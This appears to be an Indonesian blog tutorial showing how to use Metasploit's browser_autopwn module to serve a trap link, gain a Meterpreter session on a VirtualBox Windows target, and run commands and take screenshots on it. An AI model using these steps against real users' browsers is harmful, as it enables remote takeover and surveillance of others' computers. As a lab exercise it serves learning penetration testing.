Info BackTrack

Linux & Security Tutorial

Browser Autopwn di Metasploit [test localhost virtualbox]


Browser Autopwn di Metasploit berfungsi untuk melakukan jebakan link terhadap komputer lain di dalam jaringan LAN. Untuk lebih jelasnya yuk kita peraktekan aja. =))

Test kali saya lakukan di localhost, dan windows vbox akan menjadi target uji coba ^^ .

—Step 1 Mencari alamat ip target.

Disini saya menggunakan vbox windows sebagai target, jadi yang harus diketahui dulu pastilah alamat ip dari si vbox alias nilai divboxnet0 . Jalankan Vboxnya, lalu buka terminal dan ketik :


lindo@laptop:~# ifconfig

—Step 2 Metasploit

Silahkan buka Metasploit anda , atau buka di terminal dan ketik


lindo@laptop:~# msfconsole

—Step 3 Browser Autopwn

Yuk kita masuk ke mode Browser Autopwn dulu di msfconsolenya. =))


msf > use server/browser_autopwn

lalu [enter]

—Step 4 Show Options


msf  auxiliary(browser_autopwn) > show options

lalu [enter]

—Step 5 SET LHOST & URIPATH


msf  auxiliary(browser_autopwn) > set LHOST 192.168.56.1 ---> (atau nilai IP Target anda)

lalu [enter]

LHOST => 192.168.56.1

msf  auxiliary(browser_autopwn) > set URIPATH /

lalu [enter]

URIPATH => /

msf  auxiliary(browser_autopwn) >

—Step 6 RUN Browser Autopwn


msf  auxiliary(browser_autopwn) > run

lalu [enter]

Setelah loading browser_autopwn mentok, jangan lupa di ctrl + c.

—Step 7 Cek aktifitas hasil running yang diatas.


msf  auxiliary(browser_autopwn) > sessions -l

lalu [enter]

—Ste 8 Membajak CMD Target yang sudah kita scanning tadi.


msf  auxiliary(browser_autopwn) > sessions -i 1

lalu [enter]

Nb :

sessions -i -----> printah interface

Nilai 1     -----> Nilai pertama dari aktifitas Step 7 ( 1   meterpreter java/java  Administrator @ lindoxp-8b4e548  192.168.56.1:7777 -> 192.168.56.1:54778 (10.0.2.15) )

—–Nah Setelah typing sessions -i 1 , kita sudah bisa masuk ke CMD si Target. Contohnya saya melakukan “ipconfig” / “sysinfo” / “route” / “sreenshot” untuk mastiin-nya.

—-ipconfig

—sysinfo

—route

—screenshot

Nb —–> Screenshot saved to: /root/nagWSepi.jpeg

(si meterpreter bilang hasil screenshot di simpan didalam directory root, yuk kita cek) =))

— done

Demikian tutorial Browser Autopwn di Metasploit [test localhost virtualbox] , semoga bermanfaat buat teman². =))

greatz : Mama & Papa saya, u’r are my hero & Mendiang Tunangan saya , i always love u mami..

Sumber :

Youtube adalah guru terbaik setelah google. =))

http://www.offensive-security.com/metasploit-unleashed/Browser_Autopwn

Artikel Terkait:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: